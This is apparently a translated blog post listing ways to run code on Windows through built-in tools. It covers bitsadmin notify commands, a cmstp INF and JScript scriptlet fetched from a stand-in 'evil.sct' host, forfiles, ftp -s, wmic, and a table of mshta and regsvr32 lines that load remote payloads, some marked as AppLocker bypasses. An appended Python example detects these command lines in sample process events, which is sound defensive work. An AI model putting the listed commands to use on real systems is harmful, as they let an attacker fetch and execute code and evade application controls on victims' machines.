Executing Malicious Code on Windows, Part 2

Author: jjf012 | Published 2019-05-30 16:41 | 0 reads

bitsadmin

File stream (the notify command points at an alternate data stream, 1.txt:cmd.exe)
    bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /complete 1

Download
    bitsadmin /create 1 & bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\autoruns.exe & bitsadmin /RESUME 1 & bitsadmin /complete 1

Copy
    bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset

Execute
    bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset

Breakdown

    • bitsadmin /create 1: creates a job named 1
    • bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\cmd.exe: the first path is the source, the second is where the file lands on disk
    • bitsadmin /SetNotifyCmdLine 1 c:\data\cmd.exe NULL: the step that actually gets the exe executed
    • bitsadmin /RESUME 1
    • bitsadmin /Complete 1
    • bitsadmin /Reset: deletes all jobs in the manager

cmstp.exe

An inf file has to be crafted; the important part is the [UnRegisterOCXSection] section.

    [version]
    Signature=$chicago$
    AdvancedINF=2.5

    [DefaultInstall_SingleUser]
    UnRegisterOCXs=UnRegisterOCXSection

    [UnRegisterOCXSection]
    %11%\scrobj.dll,NI,https://evil.sct

    [Strings]
    AppAct = "SOFTWARE\Microsoft\Connection Manager"
    ServiceName="Yay"
    ShortSvcName="Yay"

A remote sct file is also needed:

    <?XML version="1.0"?>
    <scriptlet>
    <registration
        progid="PoC"
        classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
        <!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->

        <!-- .sct files, when downloaded, are executed from a path like this -->
        <!-- Please note: the file extension does not matter -->
        <!-- The name and extension are arbitrary -->
        <!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
        <!-- Based on current research, no registry keys are written, since this calls "uninstall" -->
        <!-- You can execute either locally or from a URL -->
        <script language="JScript">
            <![CDATA[
                // calc.exe should launch; this could be any arbitrary code.
                // What you are hoping to catch is the cmdline, modloads, network connections, or any variation
                var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
            ]]>
        </script>
    </registration>
    </scriptlet>


    cmstp.exe /ni /s c:\evil.inf

Both local and remote inf files are supposed to work, but in actual testing only a local inf triggered the calculator, about 20 seconds later.
Note: because of the [Strings] section, an extra network connection icon appears on the desktop after execution.

Forfiles

    forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe

FTP

The key is ftp -s:
    echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt

HH.exe

A download prompt appears when it runs.
    HH.exe c:\windows\system32\calc.exe

ieexec.exe

Execution path

msiexec

Both local and remote msi files work.
    msiexec /i /q payload.msi

wmic

    wmic.exe process call create calc

Summary

    Command line | Payload generation | Payload loading | Notes
    START /B cscript.exe //Nologo %temp%\msf.vbs | -f vbs | | Based on VBScript or JS; calls WScript.Shell to execute
    mshta http://evil.hta | -f hta | | Same as above
    InstallUtil.exe /logtoconsole=false /logfile= /u installUtil.dll | -f csharp | link | The library must be built first: csc.exe /target:library /unsafe /out:installUtil.dll C:\payload.cs
    MSBuild.exe c:\payload.xml | -f csharp | link |
    rundll32.exe C:\calc.dll, EntryPoint | -f dll | | rundll32.exe [target DLL],[function to call] [function arguments]
    regsvr32 /s /n /u /i:http://evil.sct | | exploit/windows/misc/regsvr32_applocker_bypass_server |
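From the defender's side, as an added example that is not part of the original post: a small Python checker that runs the command-line switches shown in this article (bitsadmin /SetNotifyCmdLine, cmstp /ni /s, forfiles /c, ftp -s:, hh.exe with an exe argument, wmic process call create, regsvr32 /i:http..., mshta http...) over constructed process-creation events. The sample events, rule names and regexes are my own assumptions and should be tuned against a real baseline before use.

```python
import re

# Constructed sample process-creation events as (image path, command line).
# These are made-up test inputs, not captured telemetry.
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\bitsadmin.exe",
     "bitsadmin /SetNotifyCmdLine 1 c:\\data\\cmd.exe NULL"),
    ("C:\\Windows\\System32\\cmstp.exe", "cmstp.exe /ni /s c:\\evil.inf"),
    ("C:\\Windows\\System32\\forfiles.exe",
     "forfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe"),
    ("C:\\Windows\\System32\\ftp.exe", "ftp -s:ftpcommands.txt"),
    ("C:\\Windows\\System32\\wbem\\WMIC.exe", "wmic.exe process call create calc"),
    ("C:\\Windows\\System32\\regsvr32.exe",
     "regsvr32 /s /n /u /i:http://evil.sct scrobj.dll"),
    ("C:\\Windows\\System32\\bitsadmin.exe", "bitsadmin /list /allusers"),  # routine use
    ("C:\\Windows\\System32\\notepad.exe", "notepad.exe report.txt"),
]

# Rules: (name, image basename, regex over the command line). The switches are
# the ones shown in this article; the rule names and regexes are assumptions.
RULES = [
    ("bitsadmin SetNotifyCmdLine", "bitsadmin.exe", r"/setnotifycmdline\b"),
    ("bitsadmin download from URL", "bitsadmin.exe", r"/addfile\s+\S+\s+https?://"),
    ("cmstp inf install", "cmstp.exe", r"/ni\b.*/s\b|/s\b.*/ni\b"),
    ("forfiles /c proxy execution", "forfiles.exe", r"/c\s"),
    ("ftp -s: script file", "ftp.exe", r"-s:"),
    ("hh.exe launching an exe", "hh.exe", r"\s\S+\.exe\b"),
    ("wmic process call create", "wmic.exe", r"process\s+call\s+create"),
    ("regsvr32 scriptlet from URL", "regsvr32.exe", r"/i:https?://"),
    ("mshta remote hta", "mshta.exe", r"https?://"),
]


def match_events(events):
    """Return [(rule name, command line)] for every event that hits a rule."""
    hits = []
    for image, cmdline in events:
        base = image.rsplit("\\", 1)[-1].lower()  # compare on the image basename only
        for name, exe, pattern in RULES:
            if base == exe and re.search(pattern, cmdline, re.IGNORECASE):
                hits.append((name, cmdline))
    return hits


if __name__ == "__main__":
    for name, cmd in match_events(SAMPLE_EVENTS):
        print(f"[{name}] {cmd}")
```

Matching on the image basename rather than the command-line text keeps a renamed binary from slipping past the rule on the command-line side alone; pair this with image-hash or signer checks in real telemetry.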

Article URL: https://www.haomeiwen.com/subject/vivvtctx.html